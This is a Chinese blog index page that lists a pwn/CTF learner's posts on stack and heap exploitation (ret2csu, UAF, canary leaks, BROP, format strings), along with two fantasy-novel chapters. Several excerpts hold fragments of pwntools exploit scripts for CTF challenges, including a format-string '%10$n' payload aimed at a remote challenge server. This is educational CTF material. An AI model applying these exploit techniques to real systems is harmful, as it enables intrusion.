- 博客(157)
- 收藏
- 关注
RSS订阅原创 【奇幻之境:命运的纠葛】第二章:初遇危机
终于,他发现其中一条通道的墙壁上刻着一些奇怪的符号,这些符号与他在城堡中其他地方看到的相似。通道内弥漫着一股潮湿的气息,墙壁上的火把闪烁着微弱的光芒,照亮了他前行的道路。他不知道在前方等待他的是什么,但他坚信,只有不断前进,才能找到真正的答案。终于,他看准了一个机会,猛地向前冲去,手中的灵力如箭般射出,准确地击中了蝙蝠的要害。他成功地探索了城堡,获得了宝贵的经验和一些神秘的物品,但他的身世之谜仍未解开。当他最终站在山顶时,眼前展现出的景象让他瞪大了眼睛——那是一座神秘的遗迹,似乎隐藏着他一直追寻的真相……
2024-03-04 17:37:48
476
原创 【奇幻之境:命运的纠葛】小说构思和第一章(番茄小说同步更新)
邪恶势力可能试图破坏世界的和平,主角需要不断提升自己的实力,与之展开激烈的战斗,并最终战胜邪恶,拯救世界。经过一番沟通,凌云向守护精灵们展示了他帮助受伤精灵的善良举动,以及他对探索神秘世界的真诚愿望。同时,加入了神秘的古老遗迹和神秘生物,增加了故事的神秘色彩。老者告诉他,遗迹所在的地方充满了危险,但只有拥有勇气和智慧的人才能揭开其中的秘密。老人告诉他,这座城堡是被施了魔法的,只有找到城堡的钥匙,才能打开大门。森林中弥漫着一股神秘的气息,古老的树木参天而立,似乎隐藏着无数的秘密。
2024-03-04 16:17:52
1144
原创 cookie
Cookie是当主机访问Web服务器创建的,将信息存储在用户计算机上的文件。一般网络用户习惯用其负数形式Cookies,指某些网站为了辨别用户身份、进行Session跟踪而存储在用户本地终端上的数据,而这些数据通常会进行加密处理。...
2021-06-20 22:10:04
267
原创 robots
robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;富国该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。...
2021-06-20 21:08:06
227
原创 栈溢出return to register(ret2reg)绕过ASLR
ROP-Ret2reg详解:https://cloud.tencent.com/developer/article/1740171
2021-04-07 21:18:48
355
原创 linux下的系统调用
linux下的系统调用全过程:https://blog.csdn.net/cs2539263027/article/details/78977054
2021-04-04 15:29:11
194
原创 Mac PWN 入门系列(七)Ret2Csu
Mac PWN 入门系列(七)Ret2Csu:https://www.anquanke.com/post/id/205858
2021-04-03 11:33:16
308
原创 Syscalls used by malloc(英文文献)
Syscalls used by malloc:https://sploitfun.wordpress.com/2015/02/11/syscalls-used-by-malloc/
2021-04-03 10:59:01
147
转载 linux系统内存管理
转载自:https://blog.csdn.net/youngleoo/article/details/47860851虚拟地址空间:每个进程都有自己的虚拟内存地址空间,32位操作系统下是4GB的内存空间,这些虚拟内存通过页表映射到实际的物理内存,它们被操作系统的内核维护并被处理器使用。每个进程都有自己的页表,一旦虚拟地址被使用,它们会被所有运行在机器上的软件所使用,包括内核自身。因此虚拟地址空间必须留一些给内核专用(Linux下3G~4G的空间),这并不意味之内核使用如此多的物理内存,而只是意味着内核
2021-04-02 18:04:38
191
原创 MAR DASCTF明御攻防赛
MAR DASCTF明御攻防赛 PWN、RE Writeup:https://www.anquanke.com/post/id/236178
2021-03-31 18:19:13
934
原创 DynELF的原理及应用
Pwntools之DynELF原理探究:https://www.freebuf.com/articles/system/193646.html
2021-03-29 20:11:39
628
原创 ret2csu
好好说话之ret2csu:https://blog.csdn.net/qq_41202237/article/details/105913597
2021-03-28 19:58:04
192
原创 堆溢出
堆漏洞-UAF漏洞简析https://blog.csdn.net/qq_43390703/article/details/108921661
2021-03-22 19:34:42
226
原创 格式化字符串printf函数机制
https://www.52pojie.cn/thread-401929-1-1.htmlprintf("%3$s", 1, “b”, “c”, 4)表示将第三个参数输出,即Cprintf(“AAA%3$n”)表示将前面字符串的个数存入第三个参数,即3
2021-03-19 12:30:12
204
原创 UAF漏洞
UAF漏洞产生原理应用程序调用free()释放内存时,如果内存块小于256kb,dlmalloc并不马上将内存块释放回内存,而是将内存块标记为空闲状态。这么做的原因有两个:一是内存块不一定能马上释放会内核(比如内存块不是位于堆顶端),二是供应用程序下次申请内存使用(这是主要原因)。当dlmalloc中空闲内存量达到一定值时dlmalloc才将空闲内存释放会内核。如果应用程序申请的内存大于256kb,dlmalloc调用mmap()向内核申请一块内存,返回返还给应用程序使用。如果应用程序释放的内存大于256
2021-03-15 13:43:48
1698
原创 DynELF获取libc版本
参考题目:攻防世界pwn-200、pwn-100https://blog.csdn.net/weixin_43868725/article/details/107878667
2021-02-25 20:28:43
186
原创 BUUCTF one_gadget
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/ng8arh
2021-02-21 13:03:05
459
原创 BUUCTF - [第五空间2019 决赛]PWN5
from pwn import *context(arch='i386',os='linux',log_level='debug',binary='pwn5')io=remote('node3.buuoj.cn',28518)elf=ELF('./pwn5')io.recvuntil('your name:')unk_addr=0x0804C044payload=p32(unk_addr)+'%10$n'io.sendline(payload)io.recvuntil('your passw
2021-02-03 20:31:20
295
原创 ptmalloc内存分配机制
堆的ptmalloc机制:https://www.cnblogs.com/P201521440001/p/9753693.html
2021-01-27 12:04:36
193
原创 GDB调试指南
GDB调试指南:https://blog.csdn.net/chen1415886044/article/details/105094688/
2021-01-23 16:29:27
157
原创 泄露Canary的正确姿势
Canary学习(泄露Canary):https://www.icode9.com/content-4-626619.html
2021-01-22 22:36:24
353
原创 汇编指令rep stosq
rep指令:https://blog.csdn.net/xrzh8989/article/details/45314111stosq指令:https://blog.csdn.net/misterliwei/article/details/4353768
2021-01-22 22:17:34
1110
1
原创 深入理解堆的实现
深入理解Glibc堆的实现(上):http://app.myzaker.com/news/article.php?pk=5cba851077ac645c53601742
2021-01-19 18:09:51
155
原创 栈溢出之BROP
Blind Return Oriented Programming (BROP) Attack - 攻击原理:https://blog.csdn.net/omnispace/article/details/51006149BROP:https://www.jianshu.com/p/2bd323e7e97f
2021-01-01 14:24:02
280
原创 绕过Canary与Canary的泄露
Canary学习(泄露Canary):https://blog.csdn.net/acsuccess/article/details/104115114泄露canary:https://blog.csdn.net/qq_38204481/article/details/81076850
2020-12-24 14:02:07
323
原创 uaf漏洞利用、use after free
UAF学习–原理及利用:https://www.cnblogs.com/alert123/p/4918041.html
2020-12-24 13:06:28
364
原创 攻防世界level0机器码形式payload
第一次写出了机器码payload哈哈哈from pwn import *context.log_level='debug'#r=remote('220.249.52.134',53019)r=process('./level0')system_call=0x400596ret_addr=0x400431#payload='A'*0x80+'B'*0x8+p64(ret_addr)+p64(system_call)payload='\x65\x65\x65\x65\x65\x65\x65\x6
2020-12-23 17:35:36
218
原创 2020XCTF华为云专场pwn题WP
PwnCPP解题思路题⽬存在uaf,结合堆⻛⽔getshell#!/usr/bin/python#coding:utf-8from pwn import *context.log_level='debug'#io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"})io=remote('124.70.12.210', 10002)libc=ELF("./libc-2.31.so")sla=lambda a : io.sendlin
2020-12-23 16:53:19
564
原创 堆溢出资料汇总
新手科普 | CTF PWN堆溢出总结:https://www.freebuf.com/articles/system/171261.htmli春秋:https://www.ichunqiu.com/course/57507
2020-12-22 18:19:24
205
原创 fuzz黑盒测试
语雀:warmup (fuzz:黑盒测试)https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/tdx0mi
2020-12-21 21:53:38
1434
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人